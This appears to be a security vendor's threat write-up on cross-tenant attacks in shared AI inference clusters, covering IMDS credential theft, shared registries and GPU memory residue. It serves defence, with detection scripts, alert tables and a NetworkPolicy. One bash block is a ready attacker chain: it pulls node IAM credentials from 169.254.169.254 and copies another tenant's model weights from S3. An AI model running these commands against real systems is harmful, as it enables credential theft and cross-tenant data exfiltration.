Executive Summary
- We track this pattern as The Pipe Crawl: a single compromised AI workload sliding through shared GPU VRAM, shared Kubernetes networking, and shared node identity to reach every other tenant on the same cluster.
- GPU cost pressure is driving dense multi-tenancy in AI inference platforms, which collapses container boundaries into shared plumbing.
- One compromised workload can pivot to other organizations' models, data, and credentials via IMDS, registry poisoning, or GPU memory residuals (CVE-2023-4969, "LeftoverLocals").
- Until you isolate hardware, registries, and node identity, one customer's breach is every customer's breach on the same cluster.
- Arrakis treats every AI workload as untrusted by default and tags every inference request with a tenant identity, so a Pipe Crawl attempt fails at the boundary instead of at the audit.

Scope & Assumptions
Why this matters
Multi-tenancy turns one breach into many.
When AI platforms optimize for utilization, they often treat containers and namespaces as a hard boundary. In practice, that boundary is soft, and the pipes between cells are wide:
- Kubernetes misconfigurations and over-privileged nodes make lateral movement realistic.
- Shared build systems and registries expand blast radius across tenants.
- GPU memory reuse can leak data even when network paths are locked down.
The walls look like concrete. The plumbing is what carries the breach.

The Origin Story (Discovery)
The illusion of "secure multi-tenancy" in AI platforms collapses when you stop looking only at the models and start looking at the infrastructure they run on.
A strong demonstration came from Wiz Research, who analyzed Hugging Face's tenant-isolation architecture. The initial access path was not exotic. It used a malicious pickle model (a known vector) to obtain code execution and a reverse shell.
From there, the escalation path looked like classic cloud compromise:
- Query the EC2 Instance Metadata Service (IMDS) of the Amazon EKS node
- Extract node-level IAM credentials
- Use those credentials to enumerate and access other customers' assets sharing the cluster
In parallel, researchers highlighted another critical risk: Hugging Face Spaces accepted user-provided Dockerfiles with insufficient build isolation. That made it possible to write into a centralized container registry serving all platform customers.
Finally, CVE-2023-4969 ("LeftoverLocals") demonstrated that isolation can fail at the silicon level. On affected GPUs, memory reuse can expose residual data from other tenants that previously shared the same physical GPU.
Message: if you share hardware in the AI ecosystem, you should assume you share risk and potentially share data.
The Technical Autopsy: Crawling the Pipes
The Pipe Crawl starts with an entry vector and then traverses one or more pipes between cells. The entry vector is most often the pickle pipe - code execution from a malicious model upload, poisoned RAG document, or CI/CD injection. Once inside, four pipes connect the compromised cell to every other tenant on the cluster:
- The IMDS pipe - reach the host's metadata service from inside a pod and steal the node IAM role
- The Identity pipe - use that node identity to call cloud APIs the pod was never meant to call
- The Registry pipe - poison or pull from a shared container registry that serves every tenant
- The GPU VRAM pipe - read residual memory left by a previous tenant's inference job
Most real-world Pipe Crawls chain the IMDS pipe and the Identity pipe with either the Registry pipe or the GPU VRAM pipe. The IMDS and Identity pipes are the fastest path; the GPU VRAM pipe is the stealthiest.
| Pipe | What flows through it |
|---|---|
| IMDS pipe | Compromised pod → host metadata service to steal the node IAM role |
| Identity pipe | Node IAM role → cross-tenant cloud API calls (S3, ECR, secrets) |
| Registry pipe | Compromised pod → shared container registry → poisoned images served to other tenants |
| GPU VRAM pipe | Compromised pod → same physical GPU → residual VRAM from previous tenant's job is readable |
Framework mapping: MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and AML.T0049 (Exploit Public-Facing Application) cover the pickle entry and the boundary escape. AML.T0024.000 (Infer Training Data Membership) maps the GPU residual case. OWASP LLM03 Supply Chain and LLM05 Improper Output Handling anchor the pickle entry point.
The cleanest illustration is to walk the chain end to end. We start inside a container on a shared EKS node - the pickle pipe has already given us code execution via a malicious model upload. Every line below is a real command an attacker runs, in order.
```bash
# STAGE 1 - The IMDS pipe: steal the node's IAM identity from inside our pod.
# EKS managed node groups commonly ship with httpPutResponseHopLimit = 2,
# which means a container can reach the host's IMDS even when IMDSv2 is "enforced".
TOKEN=$(curl -sX PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
# {
#   "AccessKeyId": "ASIA...",
#   "SecretAccessKey": "...",
#   "Token": "...",
#   "Expiration": "2026-01-29T18:30:00Z"
# }

# STAGE 2 - Wear the node's identity in our own shell.
# This role is attached to the host, not the pod. Every workload scheduled on
# this node - including other tenants' pods - shares it.
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# STAGE 3 - Cross-tenant access via the Identity pipe: read assets we never owned.
# Enumerate every S3 bucket this node role can see. The result almost always
# includes other customers' model and dataset buckets.
aws s3 ls

# Walk into a competing tenant's private model bucket and exfiltrate weights
# using the cluster's own credentials. To S3, this looks like normal cluster traffic.
aws s3 cp s3://acme-prod-models/checkpoint.safetensors ./loot.safetensors
```
The threat lands at the JSON drop in Stage 1: AccessKeyId, SecretAccessKey, Token are node-level cloud identity, not pod identity. By Stage 3 the attacker is reading a competing tenant's model weights with the cluster's own credentials - no zero-day, no exploit, just the plumbing the platform itself wired up.
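Whether Stage 1 works from inside a pod comes down to two EC2 instance metadata options on the node: HttpTokens and HttpPutResponseHopLimit. The sketch below classifies a node from those two values. The function name `imds_pod_exposure` and its three labels are illustrative assumptions, not part of any AWS tooling, and the logic reflects typical pod networking rather than every CNI setup.

```bash
# Hypothetical helper: classify how reachable IMDS is from pods on a node.
#   $1 = HttpTokens ("optional" or "required")
#   $2 = HttpPutResponseHopLimit (integer)
imds_pod_exposure() {
  local http_tokens="$1" hop_limit="$2"
  if [ "$http_tokens" != "required" ]; then
    # IMDSv1 still answers plain GETs; the hop limit only applies to the
    # IMDSv2 token (PUT) response, so it offers no protection here.
    echo "exposed-imdsv1"
  elif [ "$hop_limit" -gt 1 ]; then
    # The token response survives the extra network hop into a pod.
    echo "exposed-imdsv2"
  else
    # The token response is typically dropped before it reaches a pod.
    # Pods with hostNetwork: true sit on the host's own hop and are not covered.
    echo "restricted"
  fi
}

imds_pod_exposure required 2   # prints: exposed-imdsv2
```

The two inputs can be read with `aws ec2 describe-instances --query 'Reservations[].Instances[].MetadataOptions'`. A `restricted` result narrows the IMDS pipe rather than sealing it, because host-networked pods still share the node's hop.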
If an attacker can exploit a GPU memory side-channel (CVE-2023-4969), they may not need a network path at all. They can allocate GPU memory and read residual, un-wiped VRAM left behind by another tenant's inference job. No alert fires, because nothing crossed the network boundary.
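Because the GPU VRAM pipe leaves no network trace, the nearest observable signal is scheduling adjacency: a different tenant starting on a device shortly after another tenant's job ends. The sketch below flags those handoffs. The input format (`epoch_seconds device tenant start|end`, sorted by time) and the function name `gpu_handoffs` are assumptions made for illustration; a real scheduler log will look different, and a flagged handoff is a lead to investigate, not proof of a leak.

```bash
# Hypothetical helper: flag GPU handoffs between different tenants.
#   $1    = maximum gap in seconds between one tenant ending and another starting
#   stdin = lines of "epoch_seconds device tenant start|end", sorted by time
gpu_handoffs() {
  local max_gap="$1"
  awk -v gap="$max_gap" '
    # Remember who last finished on each device, and when.
    $4 == "end" { last_tenant[$2] = $3; last_end[$2] = $1; next }
    # A different tenant starting on the same device within the gap is a handoff.
    $4 == "start" && ($2 in last_end) && $3 != last_tenant[$2] && ($1 - last_end[$2]) <= gap {
      print $2, last_tenant[$2] "->" $3, ($1 - last_end[$2]) "s"
    }
  '
}

printf '%s\n' \
  '100 gpu-0 acme end' \
  '103 gpu-0 globex start' | gpu_handoffs 30   # prints: gpu-0 acme->globex 3s
```

Handoffs that follow a confirmed memory scrub can be filtered out upstream; the sketch has no way to know whether one ran.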
Attacker Goals and Impact
The Pipe Crawl is optimized for espionage and mass data theft.
AI platforms centralize high-value assets:
- Proprietary model weights
- Customer datasets
- Source code and internal documentation
- Sensitive user conversations and prompts
By targeting shared compute infrastructure rather than a single application, attackers gain economy of scale. One Pipe Crawl can compromise dozens of organizations in a single chain, and it can trigger regulatory exposure under GDPR and the EU AI Act as well as failures against SOC 2 commitments.
Detection & Response
This is the operational layer. Each signal below is tagged with the pipe it monitors so the reader knows where the alert lives in the architecture.
| Pipe | Signal | What to alert on |
|---|---|---|
| IMDS pipe | IMDS access from container | Any HTTP request to 169.254.169.254 originating from a pod CIDR |
| IMDS pipe | IMDSv1 fallback | Requests to IMDS without the X-aws-ec2-metadata-token header |
| Identity pipe | STS calls from pod identity | AssumeRole or GetCallerIdentity from a node role inside a workload namespace |
| Registry pipe | Cross-namespace registry pulls | Image pulls referencing a tenant-foreign namespace path |
| GPU VRAM pipe | Residual access pattern | Workloads allocating GPU memory immediately after another tenant's job ends on the same device |
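The first row of the table can be sketched as a small filter over connection records. VPC Flow Logs do not record traffic to the metadata address, so the input is assumed to come from a node-level source such as a CNI or eBPF connection log. The record format (`src dst ...` per line), the pod CIDR, and the function names are all hypothetical.

```bash
# Convert a dotted-quad IPv4 address to a 32-bit integer.
ip_to_int() {
  local IFS=. a b c d
  read -r a b c d <<< "$1"
  echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# Succeed if IPv4 address $1 falls inside CIDR block $2 (e.g. 10.42.0.0/16).
in_cidr() {
  local ip net bits mask
  ip=$(ip_to_int "$1")
  net=$(ip_to_int "${2%/*}")
  bits="${2#*/}"
  mask=$(( bits == 0 ? 0 : (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
  [ $(( ip & mask )) -eq $(( net & mask )) ]
}

# Read "src dst ..." records on stdin and print every source address
# inside the pod CIDR ($1) that contacted the metadata endpoint.
imds_hits_from_pods() {
  local pod_cidr="$1" src dst rest
  while read -r src dst rest; do
    if [ "$dst" = "169.254.169.254" ] && in_cidr "$src" "$pod_cidr"; then
      echo "$src"
    fi
  done
}

printf '%s\n' \
  '10.42.1.7 169.254.169.254 80' \
  '10.42.1.8 10.0.0.5 443' | imds_hits_from_pods 10.42.0.0/16   # prints: 10.42.1.7
```

In a hardened cluster this filter should print nothing, so any output is worth an alert rather than a dashboard.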
- Pod traffic to 169.254.169.254 - should be zero in a hardened cluster
- Pods running with hostNetwork: true or on nodes with an unrestricted IMDS hop limit
- sts:AssumeRole calls where the source identity is a node role and the session is initiated from a workload subnet

Governance & Assurance
This section answers three questions: are we exposed, what are we accountable for, and what proves we are handling it.
- The Pipe Crawl is an infrastructure-layer failure, not a model-layer failure. It does not show up in model evaluations, red-team transcripts, or prompt-injection benchmarks. It surfaces in cloud security posture, Kubernetes hardening, and supply-chain controls.
- A single Pipe Crawl event is a multi-customer breach event by definition. Disclosure obligations, contractual MSAs, and regulator timelines are triggered for every co-tenant on the affected node, cluster, or GPU - not just the one that was first compromised.
| Framework | Relevant control | Required evidence |
|---|---|---|
| SOC 2 (CC6.1, CC6.6) | Logical access boundaries between tenants | Network policy, IAM segmentation, registry isolation |
| ISO 27001 A.8.22 | Segregation of networks | Per-tenant namespace and network policy proof |
| NIST AI RMF (Manage 2.3) | Third-party AI risk management | Inventory of shared AI infra dependencies |
| GDPR Art. 32 | Security of processing | Demonstrable hardware or cryptographic isolation for personal data workloads |
| EU AI Act (Art. 15) | Cybersecurity of high-risk AI systems | Documented isolation architecture and breach-containment design |
The Fallout (Systemic Failure)
The root cause is a business tradeoff, not a technical inevitability.
To offset GPU cost, platforms pack as many workloads onto a cluster as possible. That density frequently comes with:
- Shared container registries
- Permissive cross-namespace networking
- Over-privileged nodes
- IMDS exposure from workloads
- GPU pools with no scrubbing between tenants
Wiz Research and LeftoverLocals are reminders that treating containerization as a hard security boundary is a mistake. The container is the cell. The cluster is the prison. The pipes are how you get out.
How Arrakis sees The Pipe Crawl
Most AI security tooling stares at the cell door - the model, the prompt, the output filter. The Pipe Crawl is what happens when you stop watching the door and start watching the pipes: the shared GPU, the shared cluster, the shared registry, the shared node identity.
We see The Pipe Crawl as the canonical example of a Tier 3 cross-boundary violation: an attack that uses an AI workload as a beachhead but spends most of its life cycle in classic cloud-infrastructure territory. That is why model-layer guardrails miss it entirely, and why posture tools that do not model tenancy cannot tell you who is actually exposed when one tenant is compromised.
Arrakis approaches multi-tenant AI infrastructure from three angles:
- Tenant identity at the request layer - every inference and tool call is tagged with a tenant, so cross-tenant access fails closed instead of leaking through shared identity
- Blast-radius mapping for the pipes - continuous inventory of which workloads share clusters, GPUs, and registries, so a single compromise produces a deterministic list of co-exposed tenants
- AI-aware detections for the cloud control plane - the IMDS, STS, registry, and GPU-residual signals from the Detection section above, correlated against AI workload identity rather than just pod identity
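The blast-radius idea in the second bullet can be illustrated with a few lines of shell. This is a sketch of the concept only, not Arrakis's implementation: the inventory format (one workload per line, `tenant node gpu registry`) and the function name `co_exposed_tenants` are assumptions made for the example.

```bash
# Hypothetical helper: list tenants that share a node, GPU, or registry
# with a compromised tenant.
#   $1 = compromised tenant name
#   $2 = inventory file, one workload per line: "tenant node gpu registry"
co_exposed_tenants() {
  local compromised="$1" inventory="$2"
  awk -v t="$compromised" '
    # Pass 1: record every node, GPU, and registry the compromised tenant touches.
    NR == FNR {
      if ($1 == t) { node[$2]; gpu[$3]; reg[$4] }
      next
    }
    # Pass 2: any other tenant touching one of those resources is co-exposed.
    $1 != t && (($2 in node) || ($3 in gpu) || ($4 in reg)) { print $1 }
  ' "$inventory" "$inventory" | sort -u
}
```

Called as `co_exposed_tenants acme inventory.txt`, it prints one co-exposed tenant per line. The output is deterministic for a given inventory, which is the property that matters when the list feeds a disclosure process.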
Remediation
Engineering teams should design AI infrastructure assuming containers will be breached. Close the obvious pipes this sprint, then re-pour the walls this quarter.
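One of the quickest pipes to close is pod egress to the metadata endpoint. A minimal sketch, assuming the cluster's CNI enforces Kubernetes NetworkPolicy: the function below renders a policy that allows general IPv4 egress but excludes 169.254.169.254. The function name, policy name, and namespace are placeholders.

```bash
# Hypothetical helper: render a NetworkPolicy that blocks IMDS egress
# for every pod in the given namespace.
#   $1 = namespace to protect
render_imds_block_policy() {
  local namespace="$1"
  cat <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-imds-egress
  namespace: ${namespace}
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32
EOF
}

# Review the manifest before applying it, for example:
#   render_imds_block_policy tenant-a | kubectl apply -f -
render_imds_block_policy tenant-a
```

NetworkPolicy rules are additive, so another policy that allows egress to the metadata address would reopen the pipe, and pods with hostNetwork: true are not covered. Treat this as one layer alongside a hop limit of 1 and per-workload identity.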
- Block access to 169.254.169.254 from all AI workload pods
- Enforce NetworkPolicy between AI workload namespaces

| Indicator Type | Value | Description |
|---|---|---|
| Vulnerability | CVE-2023-4969 | "LeftoverLocals" vulnerability describing GPU memory leaks that enable cross-tenant data exfiltration. |
| Network Target | 169.254.169.254 | The cloud Instance Metadata Service (IMDS) IPv4 endpoint, commonly targeted during container escapes. |
| Attack Vector | IMDS EKS Escape | Escalation from container execution to node-level credentials via Amazon EKS IMDS. |
| Attack Vector | Shared Container Registry | Insufficient build isolation allowing rogue Dockerfiles to poison centralized registries serving multiple customers. |
The walls of container isolation are advertised as concrete. The Pipe Crawl is the reminder that every cluster also has plumbing, and the plumbing connects every cell. Until the pipes are isolated, the threat model is shared, and so is the breach.